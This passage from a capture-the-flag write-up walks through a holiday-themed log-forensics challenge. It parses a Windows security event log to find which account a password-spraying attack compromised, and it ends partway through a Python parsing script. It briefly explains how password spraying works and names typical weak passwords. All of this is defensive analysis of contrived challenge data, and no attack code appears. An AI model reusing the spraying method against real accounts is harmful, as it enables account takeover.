has written on it in red pen,&lt;/em&gt; &lt;a class="reference external" href="https://www.youtube.com/watch?v=DlQoXP2XH68"&gt;&amp;quot;NOW I HAVE A ZERO-DAY. HO-HO-HO.&amp;quot;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;A rumor spreads among the elves that Alabaster has lost his badge. Several
elves say, &amp;quot;What do you think someone could do with that?&amp;quot;&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="section" id="pepper-minstix-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id24"&gt;Pepper Minstix' Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Apparently, someone's email account was compromised, and we have to analyze
logs to find out which one:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;I am Pepper Minstix, and I&amp;#39;m looking for your help.&lt;/span&gt;
&lt;span class="go"&gt;Bad guys have us tangled up in pepperminty kelp!&lt;/span&gt;
&lt;span class="go"&gt;&amp;quot;Password spraying&amp;quot; is to blame for this our grinchly fate.&lt;/span&gt;
&lt;span class="go"&gt;Should we blame our password policies which users hate?&lt;/span&gt;

&lt;span class="go"&gt;Here you&amp;#39;ll find a web log filled with failure and success.&lt;/span&gt;
&lt;span class="go"&gt;One successful login there requires your redress.&lt;/span&gt;
&lt;span class="go"&gt;Can you help us figure out which user was attacked?&lt;/span&gt;
&lt;span class="go"&gt;Tell us who fell victim, and please handle this with tact...&lt;/span&gt;

&lt;span class="go"&gt;  Submit the compromised webmail username to&lt;/span&gt;
&lt;span class="go"&gt;  runtoanswer to complete this challenge.&lt;/span&gt;
&lt;span class="gp"&gt;elf@3c8eb61a4504:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's take a look at the file we have:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@3c8eb61a4504:~$&lt;/span&gt; ls -lh
&lt;span class="go"&gt;total 6.8M&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf 1.4K Dec 14 16:13 evtx_dump.py&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf 1.1M Dec 14 16:13 ho-ho-no.evtx&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 elf elf 5.7M Dec 14 16:13 runtoanswer&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, we have &lt;code&gt;runtoanswer&lt;/code&gt; — once we have found who was compromised —,
we have &lt;code&gt;ho-ho-no.evtx&lt;/code&gt; — which is a Windows log extract — and we have
a &lt;code&gt;evtx_dump.py&lt;/code&gt; Python script, which parses the &lt;code&gt;.evtx&lt;/code&gt;, and dump
the result in an XML format:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@3c8eb61a4504:~$&lt;/span&gt; python evtx_dump.py ho-ho-no.evtx
&lt;span class="go"&gt;&amp;lt;?xml version=&amp;quot;1.1&amp;quot; encoding=&amp;quot;utf-8&amp;quot; standalone=&amp;quot;yes&amp;quot; ?&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Events&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Event xmlns=&amp;quot;http://schemas.microsoft.com/win/2004/08/events/event&amp;quot;&amp;gt;&amp;lt;System&amp;gt;&amp;lt;Provider Name=&amp;quot;Mi&lt;/span&gt;
&lt;span class="go"&gt;crosoft-Windows-Security-Auditing&amp;quot; Guid=&amp;quot;{54849625-5478-4994-a5ba-3e3b0328c30d}&amp;quot;&amp;gt;&amp;lt;/Provider&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4647&amp;lt;/EventID&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Version&amp;gt;0&amp;lt;/Version&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Level&amp;gt;0&amp;lt;/Level&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Task&amp;gt;12545&amp;lt;/Task&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Opcode&amp;gt;0&amp;lt;/Opcode&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Keywords&amp;gt;0x8020000000000000&amp;lt;/Keywords&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;TimeCreated SystemTime=&amp;quot;2018-09-10 12:18:26.972103&amp;quot;&amp;gt;&amp;lt;/TimeCreated&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;EventRecordID&amp;gt;231712&amp;lt;/EventRecordID&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Correlation ActivityID=&amp;quot;{fd18dc13-48f8-0001-58dc-18fdf848d401}&amp;quot; RelatedActivityID=&amp;quot;&amp;quot;&amp;gt;&amp;lt;/Correla&lt;/span&gt;
&lt;span class="go"&gt;tion&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Execution ProcessID=&amp;quot;660&amp;quot; ThreadID=&amp;quot;752&amp;quot;&amp;gt;&amp;lt;/Execution&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Channel&amp;gt;Security&amp;lt;/Channel&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Computer&amp;gt;WIN-KCON-EXCH16.EM.KRINGLECON.COM&amp;lt;/Computer&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Security UserID=&amp;quot;&amp;quot;&amp;gt;&amp;lt;/Security&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;/System&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;EventData&amp;gt;&amp;lt;Data Name=&amp;quot;TargetUserSid&amp;quot;&amp;gt;S-1-5-21-25059752-1411454016-2901770228-500&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;Administrator&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Data Name=&amp;quot;TargetDomainName&amp;quot;&amp;gt;EM.KRINGLECON&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;Data Name=&amp;quot;TargetLogonId&amp;quot;&amp;gt;0x0000000000969b09&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;/EventData&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;/Event&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For ease of analysis, you can download the XML file &lt;a class="reference external" href="/docs/sans-christmas-challenge-2018/ho-ho-no.xml"&gt;here&lt;/a&gt;.
We're told that the attack was a &lt;a class="reference external" href="https://www.triaxiomsecurity.com/2018/11/08/password-spraying-attack/"&gt;password spraying&lt;/a&gt;
attack. This means that an attacker chooses a well-known or very probable
password, such as &lt;code&gt;P&amp;#64;ssw0rd&lt;/code&gt;, or &lt;code&gt;Winter2018&lt;/code&gt;, and tries to
authenticate as every user with this password. This can be very efficient,
because it allows to find weak accounts, without risking blocking any account.&lt;/p&gt;
&lt;p&gt;If we look at the XML log file, we can see that the attacker tried to
authenticate as every user in alphabetical order, starting with
&lt;code&gt;aaron.smith&lt;/code&gt;, &lt;code&gt;abhishek.kumar&lt;/code&gt;, etc., all the way down to
&lt;code&gt;vinod.kumar&lt;/code&gt;, &lt;code&gt;wunorse.openslae&lt;/code&gt;. If the login didn't work, we
can see that the event has an attribute &lt;code&gt;&amp;lt;Data Name=&amp;quot;FailureReason&amp;quot;&amp;gt;&lt;/code&gt;.
Let's try some regex magic to find which user does not have such an attribute:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -E &lt;span class="s1"&gt;&amp;#39;&amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;[a-z.]+&amp;lt;/Data&amp;gt;|&amp;lt;Data Name=&amp;quot;FailureReason&amp;quot;&amp;gt;%%2313&amp;lt;/Data&amp;gt;&amp;#39;&lt;/span&gt; ho-ho-no.xml &lt;span class="c1"&gt;# We only target users with lower-case username&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;sparkle.redberry&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;FailureReason&amp;quot;&amp;gt;%%2313&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;sparkle.redberry&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;sparkle.redberry&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;bushy.evergreen&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;bushy.evergreen&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;test.user&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;FailureReason&amp;quot;&amp;gt;%%2313&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;shinny.upatree&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;shinny.upatree&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;aaron.smith&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;FailureReason&amp;quot;&amp;gt;%%2313&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;abhishek.kumar&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;FailureReason&amp;quot;&amp;gt;%%2313&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;adam.smith&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;FailureReason&amp;quot;&amp;gt;%%2313&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            [snip]&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;mike.miller&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;FailureReason&amp;quot;&amp;gt;%%2313&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;mike.smith&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;FailureReason&amp;quot;&amp;gt;%%2313&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;mike.williams&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;FailureReason&amp;quot;&amp;gt;%%2313&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;minty.candycane&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;minty.candycane&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;mohamed.ahmed&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;FailureReason&amp;quot;&amp;gt;%%2313&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;mohamed.ali&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;FailureReason&amp;quot;&amp;gt;%%2313&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;muhammad.ali&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;            &amp;lt;Data Name=&amp;quot;FailureReason&amp;quot;&amp;gt;%%2313&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that &lt;code&gt;minty.candycane&lt;/code&gt; does not have a &lt;code&gt;FailureReason&lt;/code&gt;
after her login event. This means that the password spraying attack worked
against her account. She's the account we're looking for:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@230a1d67fee6:~$&lt;/span&gt; ./runtoanswer
&lt;span class="go"&gt;Loading, please wait......&lt;/span&gt;



&lt;span class="hll"&gt;&lt;span class="go"&gt;Whose account was successfully accessed by the attacker&amp;#39;s password spray? minty.candycane&lt;/span&gt;
&lt;/span&gt;

&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM   MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMMMMMMMMMM   NM   M   NMMMMMMMMMMMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMMMMMMMMMM             MMMMMMMMMMMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMMMMW  KWMMNK       KWMMNK KMMMMMMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMMMM       NMMM   MMM       WMMMMMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMMMMMW        K           NMMMMMMMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMN   MMMMMMMMMMMWK           KWMMMMMMMMMMM   WMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMWK MMM    MMMMMMMMMMMMMMM      NMMMMMMMMMMMMMMM   KMMWKKWMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMM   KMM    MMMMMMMMMMMMN KNM   MN  WMMMMMMMMMMMM   KMM    MMMMMM&lt;/span&gt;
&lt;span class="go"&gt;M        KMM    MMMMMMMMMMMM             MMMMMMMMMMMM   KMM         M&lt;/span&gt;
&lt;span class="go"&gt;MMN       MM    MMMMMMMMMMMMMN        KWMMMMMMMMMMMMM   KMM       NMM&lt;/span&gt;
&lt;span class="go"&gt;MW              MMN   MMMMMWMMMMW   MMMMWWMMMMW   WMM             KMM&lt;/span&gt;
&lt;span class="go"&gt;M     KWMN      NMK   MMMN     NM   M      MMM    NM       NMNK     M&lt;/span&gt;
&lt;span class="go"&gt;MMWWMMW               WMM                  WMM               NMMMNWMM&lt;/span&gt;
&lt;span class="go"&gt;MMMN        NMMW       NMK   N        KK   WM       KMMW        KWMMM&lt;/span&gt;
&lt;span class="go"&gt;MM      KWMMMM               MMMM   MMMN               MMMMWK     KMM&lt;/span&gt;
&lt;span class="go"&gt;MMW KNMMMMMMMMK   WMMMW       NMM   MW        MMMMWK   MMMMMMMM  KWMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMW                            KWMMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMW      WMMMMN       WMMMMN      MMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMN       K            K       KWMMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMWKKWMMMMMMMMK   MMMMW        MM   MWK      KWMMMW    MMMMMMMMNKKMMM&lt;/span&gt;
&lt;span class="go"&gt;MM       WMMMM               MMMM   MMMN               MMMMWK     KMM&lt;/span&gt;
&lt;span class="go"&gt;MMMN        NMMW       NMK   NK       KK   WM       KWMM         NMMM&lt;/span&gt;
&lt;span class="go"&gt;MMWWMMWK              WMM                  WMM                MMMWMMM&lt;/span&gt;
&lt;span class="go"&gt;M      WMN      NMK   MMMN      M   W      MMM    NM       WMWK     M&lt;/span&gt;
&lt;span class="go"&gt;MW              MMN   MMMMMNMMMMM   MMMMWNMMMMW   WMM             KWM&lt;/span&gt;
&lt;span class="go"&gt;MMN       MM    MMMMMMMMMMMMMNK       KWMMMMMMMMMMMMM   KMM      KWMM&lt;/span&gt;
&lt;span class="go"&gt;M        KMM    MMMMMMMMMMMM             MMMMMMMMMMMM   KMM    K    M&lt;/span&gt;
&lt;span class="go"&gt;MWWMMM   KMM    MMMMMMMMMMMM    M   W   NMMMMMMMMMMMM   KMM    MMMWMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMNKKMMM    MMMMMMMMMMMMMMMN    KWMMMMMMMMMMMMMMM   KMMWKKWMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMM    MMMMMMMMMMMWK            MMMMMMMMMMMM   WMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMMMMMM                    NMMMMMMMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMMMM        MMM   MMW       WMMMMMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMMMMW  KWMMWK        WMMN  KMMMMMMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMMMMMMMMMM             MMMMMMMMMMMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMMMMMMMMMM    M   WK  NMMMMMMMMMMMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM   MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM&lt;/span&gt;
&lt;span class="go"&gt;MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM&lt;/span&gt;

&lt;span class="go"&gt;Silly Minty Candycane, well this is what she gets.&lt;/span&gt;
&lt;span class="go"&gt;&amp;quot;Winter2018&amp;quot; isn&amp;#39;t for The Internets.&lt;/span&gt;
&lt;span class="go"&gt;Passwords formed with season-year are on the hackers&amp;#39; list.&lt;/span&gt;
&lt;span class="go"&gt;Maybe we should look at guidance published by the NIST?&lt;/span&gt;

&lt;span class="go"&gt;Congratulations!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To solve this challenge, we can also be a bit fancy, and use a Python script
to parse the XML file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python3&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;sys&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;bs4&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BeautifulSoup&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;datetime&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Usage: {} &amp;lt;xml_event_file&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt;
        &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# This set will hold every user without a FailureReason attribute&lt;/span&gt;
    &lt;span class="n"&gt;user_set_with_no_failure&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;set&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="c1"&gt;# The date of the spray attack was determined manually, by looking at the&lt;/span&gt;
    &lt;span class="c1"&gt;# date of the attack against aaron.smith&lt;/span&gt;
    &lt;span class="n"&gt;spray_attack_beginning&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;datetime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;datetime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;strptime&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;2018-09-10 13:03:33&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;%Y-%m-&lt;/span&gt;&lt;span class="si"&gt;%d&lt;/span&gt;&lt;span class="s1"&gt; %H:%M:%S&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# We open and parse the file&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;r&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;soup&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BeautifulSoup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;lxml&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;evt&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;soup&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;events&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;find_all&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="c1"&gt;# We check the date of every event.&lt;/span&gt;
        &lt;span class="c1"&gt;# If it&amp;#39;s before the attack, we don&amp;#39;t look at it&lt;/span&gt;
        &lt;span class="n"&gt;event_time&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;evt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;system&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;timecreated&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;systemtime&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;.&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
        &lt;span class="n"&gt;event_time&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;datetime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;datetime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;strptime&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;event_time&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;%Y-%m-&lt;/span&gt;&lt;span class="si"&gt;%d&lt;/span&gt;&lt;span class="s1"&gt; %H:%M:%S&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;event_time&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;spray_attack_beginning&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;continue&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;evt_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;evt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;eventdata&lt;/span&gt;
            &lt;span class="c1"&gt;# If there&amp;#39;s no failure reason, we add our user to our result set.&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;evt_data&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;find_all&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;attrs&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;FailureReason&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;}):&lt;/span&gt;
